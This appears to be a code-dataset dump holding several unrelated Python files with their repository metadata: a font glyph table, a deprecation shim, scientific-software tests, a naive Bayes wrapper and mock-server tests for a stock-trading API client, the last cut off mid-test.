[0x00, 0x00, 0x00, 0x00, 0x00], # 0x52
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x53
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x54
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x55
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x56
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x57
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x58
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x59
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x5A
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x5B
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x5C
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x5D
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x5E
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x5F
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x60
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x61
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x62
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x63
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x64
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x65
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x66
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x67
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x68
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x69
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x6A
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x6B
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x6C
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x6D
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x6E
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x6F
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x70
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x71
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x72
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x73
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x74
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x75
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x76
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x77
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x78
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x79
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x7A
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x7B
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x7C
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x7D
[0x03, 0x03, 0x00], # 0x7E '~' displayed as '°'
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x7F
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x80
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x81
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x82
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x83
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x84
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x85
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x86
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x87
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x88
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x89
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x8A
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x8B
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x8C
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x8D
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x8E
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x8F
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x90
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x91
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x92
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x93
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x94
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x95
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x96
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x97
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x98
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x99
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x9A
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x9B
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x9C
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x9D
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x9E
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x9F
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA0
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA1
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA2
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA3
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA4
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA5
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA6
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA7
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA8
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA9
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xAA
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xAB
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xAC
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xAD
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xAE
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xAF
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB0
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB1
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB2
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB3
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB4
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB5
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB6
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB7
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB8
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB9
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xBA
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xBB
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xBC
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xBD
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xBE
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xBF
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC0
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC1
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC2
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC3
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC4
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC5
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC6
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC7
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC8
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC9
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xCA
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xCB
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xCC
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xCD
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xCE
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xCF
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD0
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD1
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD2
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD3
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD4
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD5
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD6
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD7
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD8
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD9
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xDA
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xDB
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xDC
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xDD
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xDE
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xDF
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE0
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE1
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE2
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE3
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE4
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE5
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE6
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE7
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE8
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE9
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xEA
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xEB
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xEC
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xED
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xEE
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xEF
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF0
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF1
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF2
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF3
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF4
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF5
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF6
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF7
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF8
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF9
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xFA
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xFB
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xFC
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xFD
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xFE
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xFF
]
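# --- Hedged example (not part of the original module) ----------------------
# Both tables above follow the usual column-major layout for small LCD/OLED
# fonts: each integer is one pixel column of the glyph, and bit 0 is assumed
# to map to the top row.  render_glyph() below is a hypothetical helper that
# renders one glyph as ASCII art under that assumption.
def render_glyph(columns, height=7):
    """Return the glyph as a list of strings, one string per pixel row."""
    rows = []
    for y in range(height):
        # For each column word, test the bit belonging to this row.
        rows.append(''.join('#' if (col >> y) & 1 else '.' for col in columns))
    return rows
# Usage sketch: print the digit '7' from the thermometer font.
if __name__ == '__main__':
    for line in render_glyph(THERM_DIGITS_FONT[ord('7')]):
        print(line)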
| 70.399497
| 92
| 0.53875
| 11,888
| 112,076
| 5.07781
| 0.044583
| 1.103885
| 1.431591
| 1.622927
| 0.860731
| 0.742665
| 0.715547
| 0.704183
| 0.699313
| 0.653292
| 0
| 0.604966
| 0.318694
| 112,076
| 1,591
| 93
| 70.443746
| 0.185495
| 0.093651
| 0
| 0.839411
| 0
| 0
| 0.00006
| 0
| 0
| 0
| 0.537135
| 0
| 0
| 1
| 0.00064
| false
| 0
| 0.00064
| 0
| 0.001919
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
bf6fd8033e7d3d604ad9c4cbace77ff11bb55f66
| 239
|
py
|
Python
|
nmigen_boards/machxo3_sk.py
|
lethalbit/nmigen-boards
|
aaf18252e457ff95257137da2a629820c0ff2bfa
|
[
"BSD-2-Clause"
] | 11
|
2021-12-10T12:23:29.000Z
|
2022-03-13T08:40:20.000Z
|
nmigen_boards/machxo3_sk.py
|
lethalbit/nmigen-boards
|
aaf18252e457ff95257137da2a629820c0ff2bfa
|
[
"BSD-2-Clause"
] | 12
|
2021-12-11T18:51:29.000Z
|
2022-03-12T05:08:52.000Z
|
nmigen_boards/machxo3_sk.py
|
lethalbit/nmigen-boards
|
aaf18252e457ff95257137da2a629820c0ff2bfa
|
[
"BSD-2-Clause"
] | 7
|
2021-12-12T07:20:21.000Z
|
2022-03-06T06:20:55.000Z
|
from amaranth_boards.machxo3_sk import *
from amaranth_boards.machxo3_sk import __all__
import warnings
warnings.warn("instead of nmigen_boards.machxo3_sk, use amaranth_boards.machxo3_sk",
DeprecationWarning, stacklevel=2)
| 29.875
| 84
| 0.803347
| 31
| 239
| 5.806452
| 0.516129
| 0.288889
| 0.333333
| 0.383333
| 0.366667
| 0.366667
| 0
| 0
| 0
| 0
| 0
| 0.024272
| 0.138075
| 239
| 7
| 85
| 34.142857
| 0.849515
| 0
| 0
| 0
| 0
| 0
| 0.280335
| 0.213389
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bfa387b74f7560b0102d0516a1ef9aca5eede727
| 1,790
|
py
|
Python
|
tests/test_kv_parsing_array_type_promotion.py
|
libAtoms/extxyz
|
f48a3c68a50eebaef035b8c615120dbccaaa38c6
|
[
"MIT"
] | 3
|
2021-06-18T15:07:57.000Z
|
2022-01-26T22:02:01.000Z
|
tests/test_kv_parsing_array_type_promotion.py
|
libAtoms/extxyz
|
f48a3c68a50eebaef035b8c615120dbccaaa38c6
|
[
"MIT"
] | 7
|
2021-07-26T13:12:25.000Z
|
2022-01-26T22:35:17.000Z
|
tests/test_kv_parsing_array_type_promotion.py
|
libAtoms/extxyz
|
f48a3c68a50eebaef035b8c615120dbccaaa38c6
|
[
"MIT"
] | 1
|
2021-06-24T09:17:33.000Z
|
2021-06-24T09:17:33.000Z
|
def test_array_one_d_type_promotion(tmp_path, helpers):
# int + float to float
v_str = [ '1', '2', '3.0', '+4.0e0' ]
v = [1.0, 2.0, 3.0, 4.0]
helpers.do_one_d_variants(tmp_path, False, 4, v, v_str)
# int + barestring to string
v_str = [ '1', '2', 'abc', 'd']
v = ['1', '2', 'abc', 'd']
helpers.do_one_d_variants(tmp_path, True, 4, v, v_str)
# bool + barestring to string
v_str = [ 'T', 'False', 'abc', 'd']
v = ['T', 'False', 'abc', 'd']
helpers.do_one_d_variants(tmp_path, True, 4, v, v_str)
# bool + quotedstring to string
v_str = [ 'T', 'False', '"abc"', 'd']
v = ['T', 'False', 'abc', 'd']
helpers.do_one_d_variants(tmp_path, True, 4, v, v_str)
# bool + int to string
v_str = [ 'T', 'False', '12', '345' ]
v = ['T', 'False', '12', '345']
helpers.do_one_d_variants(tmp_path, True, 4, v, v_str)
def test_array_two_d_type_promotion(tmp_path, helpers):
# int + float to float
v_str = [ '1', '2', '3.0', '+4.0e0' ]
v = [1.0, 2.0, 3.0, 4.0]
helpers.do_two_d_variants(tmp_path, 2, 2, v, v_str)
# # int + barestring to string
# v_str = [ '1', '2', 'abc', 'd']
# v = ['1', '2', 'abc', 'd']
# helpers.do_two_d_variants(tmp_path, 2, 2, v, v_str)
# # bool + barestring to string
# v_str = [ 'T', 'False', 'abc', 'd']
# v = ['T', 'False', 'abc', 'd']
# helpers.do_two_d_variants(tmp_path, 2, 2, v, v_str)
# # bool + quotedstring to string
# v_str = [ 'T', 'False', '"abc"', 'd']
# v = ['T', 'False', 'abc', 'd']
# helpers.do_two_d_variants(tmp_path, 2, 2, v, v_str)
# # bool + int to string
# v_str = [ 'T', 'False', '12', '345' ]
# v = ['T', 'False', '12', '345']
# helpers.do_two_d_variants(tmp_path, 2, 2, v, v_str)
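# --- Hedged illustration (not part of this test file) ----------------------
# The promotion rule exercised above can be summarised as: values that are all
# numeric promote to a float array, while any mix involving strings or booleans
# promotes to a string array.  promote() is a hypothetical helper that mirrors
# that behaviour for a flat list of already-parsed values.
def promote(values):
    """Coerce values to a common type: float if all numeric, otherwise str."""
    all_numeric = all(
        isinstance(v, (int, float)) and not isinstance(v, bool) for v in values
    )
    if all_numeric:
        return [float(v) for v in values]
    return [str(v) for v in values]
# e.g. promote([1, 2, 3.0, 4.0]) == [1.0, 2.0, 3.0, 4.0]      # int + float -> float
# e.g. promote([1, 2, 'abc', 'd']) == ['1', '2', 'abc', 'd']  # int + string -> string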
| 33.773585
| 60
| 0.529609
| 302
| 1,790
| 2.900662
| 0.112583
| 0.091324
| 0.136986
| 0.182648
| 0.958904
| 0.958904
| 0.958904
| 0.937215
| 0.937215
| 0.937215
| 0
| 0.054315
| 0.249162
| 1,790
| 52
| 61
| 34.423077
| 0.59747
| 0.409497
| 0
| 0.5
| 0
| 0
| 0.095238
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bfb222438deef7e074c102ba9ad97fd5be5c73ca
| 209
|
py
|
Python
|
classifier/naive_bayes/__init__.py
|
ecohealthalliance/eha_grit
|
cb95b759222ca7a416dd7d439571e7b610dd5e23
|
[
"Apache-2.0"
] | null | null | null |
classifier/naive_bayes/__init__.py
|
ecohealthalliance/eha_grit
|
cb95b759222ca7a416dd7d439571e7b610dd5e23
|
[
"Apache-2.0"
] | null | null | null |
classifier/naive_bayes/__init__.py
|
ecohealthalliance/eha_grit
|
cb95b759222ca7a416dd7d439571e7b610dd5e23
|
[
"Apache-2.0"
] | null | null | null |
from classifier import sklearn_classifier
from sklearn.naive_bayes import MultinomialNB as NaiveBayes
def classify(train, test):
nb = NaiveBayes()
return sklearn_classifier.classify(train, test, nb)
| 26.125
| 59
| 0.794258
| 26
| 209
| 6.269231
| 0.576923
| 0.208589
| 0.208589
| 0.233129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.143541
| 209
| 7
| 60
| 29.857143
| 0.910615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.4
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
44a1c31de028627df585f65f80737db9218bee08
| 2,568
|
py
|
Python
|
BirdSongToolbox/test/test_preprocessing/test_hilbert_modules.py
|
Darilbii/BirdSongToolbox
|
f4853a7f6cb5c4ef0f57e9f346be08f6e153ca65
|
[
"Apache-2.0"
] | 3
|
2021-08-03T00:03:37.000Z
|
2021-09-25T04:37:52.000Z
|
BirdSongToolbox/test/test_preprocessing/test_hilbert_modules.py
|
Darilbii/BirdSongToolbox
|
f4853a7f6cb5c4ef0f57e9f346be08f6e153ca65
|
[
"Apache-2.0"
] | 1
|
2021-08-08T11:04:36.000Z
|
2021-08-08T11:04:36.000Z
|
BirdSongToolbox/test/test_preprocessing/test_hilbert_modules.py
|
Darilbii/BirdSongToolbox
|
f4853a7f6cb5c4ef0f57e9f346be08f6e153ca65
|
[
"Apache-2.0"
] | null | null | null |
from BirdSongToolbox.ImportClass import Import_PrePd_Data
from BirdSongToolbox.PreProcessClass import BPF_Master, BPF_Module, hilbert_module
import numpy as np
import pytest
bird_id = 'z020'
date = 'day-2016-06-02'
@pytest.mark.run(order=1)
def test_hilbert_module_phase(PrePd_data_dir_path):
PreP_Data = Import_PrePd_Data(bird_id, date, location=PrePd_data_dir_path)
Channels = PreP_Data.Song_Neural
Freq_Bands = ([10], [1])
SN_L = PreP_Data.Sn_Len
Gp_L = PreP_Data.Gap_Len
Num_Chan = PreP_Data.Num_Chan
order_num = 175
fs = PreP_Data.Fs
FiltFilt = True
Num_Trials = PreP_Data.Num_Motifs
song_length, number_channels = np.shape(Channels[0])
tops, bottoms = Freq_Bands
num_freq = len(tops)
assert number_channels == Num_Chan
Frequencies = BPF_Master(Channels, Num_Trials=Num_Trials, Freq_Bands=Freq_Bands, SN_L=SN_L, Gp_L=Gp_L,
Num_Chan=Num_Chan, Num_Freq=len(tops), order_num=order_num, fs=fs, FiltFilt=FiltFilt,
verbose=False)
hilbert_results = hilbert_module(Frequencies, output='phase')
# Smoke Tests: hilbert_results
assert isinstance(hilbert_results, list)
assert isinstance(hilbert_results[0], list)
assert isinstance(hilbert_results[0][0], np.ndarray)
assert np.shape(hilbert_results) == (Num_Trials, number_channels, song_length, num_freq)
def test_hilbert_module_amplitude(PrePd_data_dir_path):
PreP_Data = Import_PrePd_Data(bird_id, date, location=PrePd_data_dir_path)
Channels = PreP_Data.Song_Neural
Freq_Bands = ([10], [1])
SN_L = PreP_Data.Sn_Len
Gp_L = PreP_Data.Gap_Len
Num_Chan = PreP_Data.Num_Chan
order_num = 175
fs = PreP_Data.Fs
FiltFilt = True
Num_Trials = PreP_Data.Num_Motifs
song_length, number_channels = np.shape(Channels[0])
tops, bottoms = Freq_Bands
num_freq = len(tops)
assert number_channels == Num_Chan
Frequencies = BPF_Master(Channels, Num_Trials=Num_Trials, Freq_Bands=Freq_Bands, SN_L=SN_L, Gp_L=Gp_L,
Num_Chan=Num_Chan, Num_Freq=len(tops), order_num=order_num, fs=fs, FiltFilt=FiltFilt,
verbose=False)
hilbert_results = hilbert_module(Frequencies, output='amplitude')
# Smoke Tests: hilbert_results
assert isinstance(hilbert_results, list)
assert isinstance(hilbert_results[0], list)
assert isinstance(hilbert_results[0][0], np.ndarray)
assert np.shape(hilbert_results) == (Num_Trials, number_channels, song_length, num_freq)
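# --- Hedged sketch (not from BirdSongToolbox itself) ------------------------
# The two outputs checked above correspond to the standard analytic-signal
# decomposition: instantaneous phase and envelope amplitude.  The hypothetical
# helper below shows that computation for a single 1-D trace using
# scipy.signal.hilbert, purely as an illustration of what the smoke tests expect.
import numpy as np
from scipy.signal import hilbert
def phase_and_amplitude(trace):
    """Return (instantaneous phase, envelope amplitude) of a 1-D signal."""
    analytic = hilbert(trace)  # analytic signal: trace + i * H(trace)
    return np.angle(analytic), np.abs(analytic)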
| 34.24
| 114
| 0.716121
| 368
| 2,568
| 4.649457
| 0.192935
| 0.065459
| 0.080655
| 0.105202
| 0.847458
| 0.847458
| 0.847458
| 0.847458
| 0.847458
| 0.847458
| 0
| 0.015474
| 0.194704
| 2,568
| 74
| 115
| 34.702703
| 0.811896
| 0.022196
| 0
| 0.792453
| 0
| 0
| 0.012764
| 0
| 0
| 0
| 0
| 0
| 0.188679
| 1
| 0.037736
| false
| 0
| 0.113208
| 0
| 0.150943
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
78055f0f394b07a9be00dbf1b24952cd307a498f
| 55
|
py
|
Python
|
cell2location/models/base/__init__.py
|
bio-ruxandra-tesloianu/cell2location
|
7d9a187b88cf67d6d134b452749f325826d67a57
|
[
"Apache-2.0"
] | null | null | null |
cell2location/models/base/__init__.py
|
bio-ruxandra-tesloianu/cell2location
|
7d9a187b88cf67d6d134b452749f325826d67a57
|
[
"Apache-2.0"
] | null | null | null |
cell2location/models/base/__init__.py
|
bio-ruxandra-tesloianu/cell2location
|
7d9a187b88cf67d6d134b452749f325826d67a57
|
[
"Apache-2.0"
] | null | null | null |
from . import pymc3_model
from . import pymc3_loc_model
| 27.5
| 29
| 0.836364
| 9
| 55
| 4.777778
| 0.555556
| 0.465116
| 0.697674
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.041667
| 0.127273
| 55
| 2
| 29
| 27.5
| 0.854167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
780a8c086dc252a1e623a936680b2cb8c8ed4c41
| 10,869
|
py
|
Python
|
tests/test_stocks.py
|
omikader/aiorobinhood
|
132487133186058049d893a849660508dd0fa09e
|
[
"MIT"
] | 9
|
2020-08-05T23:40:16.000Z
|
2021-08-18T10:30:15.000Z
|
tests/test_stocks.py
|
omikader/aiorobinhood
|
132487133186058049d893a849660508dd0fa09e
|
[
"MIT"
] | 3
|
2020-08-26T15:36:31.000Z
|
2020-08-26T17:02:33.000Z
|
tests/test_stocks.py
|
omikader/aiorobinhood
|
132487133186058049d893a849660508dd0fa09e
|
[
"MIT"
] | 1
|
2020-08-15T00:26:07.000Z
|
2020-08-15T00:26:07.000Z
|
import asyncio
import json
import pytest
from aiorobinhood import HistoricalInterval, HistoricalSpan
from aiorobinhood.urls import (
FUNDAMENTALS,
HISTORICALS,
INSTRUMENTS,
QUOTES,
RATINGS,
TAGS,
)
@pytest.mark.asyncio
async def test_get_fundamentals_by_symbols(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(client.get_fundamentals(symbols=["ABCD"]))
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == FUNDAMENTALS.path
assert request.query["symbols"] == "ABCD"
server.send_response(
request,
content_type="application/json",
text=json.dumps({"results": [{}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == [{}]
@pytest.mark.asyncio
async def test_get_fundamentals_by_instruments(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(client.get_fundamentals(instruments=["<>"]))
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == FUNDAMENTALS.path
assert request.query["instruments"] == "<>"
server.send_response(
request,
content_type="application/json",
text=json.dumps({"results": [{}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == [{}]
@pytest.mark.asyncio
async def test_get_fundamentals_value_error(logged_in_client):
client, _ = logged_in_client
with pytest.raises(ValueError):
await client.get_fundamentals()
with pytest.raises(ValueError):
await client.get_fundamentals(symbols=["ABCD"], instruments=["<>"])
@pytest.mark.asyncio
async def test_get_instruments_by_symbol(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(client.get_instruments(symbol="ABCD"))
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == INSTRUMENTS.path
assert request.query["symbol"] == "ABCD"
server.send_response(
request,
content_type="application/json",
text=json.dumps({"next": str(pytest.NEXT), "results": [{"foo": "bar"}]}),
)
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == pytest.NEXT.path
server.send_response(
request,
content_type="application/json",
text=json.dumps({"next": None, "results": [{"baz": "quux"}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == [{"foo": "bar"}, {"baz": "quux"}]
@pytest.mark.asyncio
async def test_get_instruments_by_ids(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(client.get_instruments(ids=["12345"]))
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == INSTRUMENTS.path
assert request.query["ids"] == "12345"
server.send_response(
request,
content_type="application/json",
text=json.dumps({"next": str(pytest.NEXT), "results": [{"foo": "bar"}]}),
)
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == pytest.NEXT.path
server.send_response(
request,
content_type="application/json",
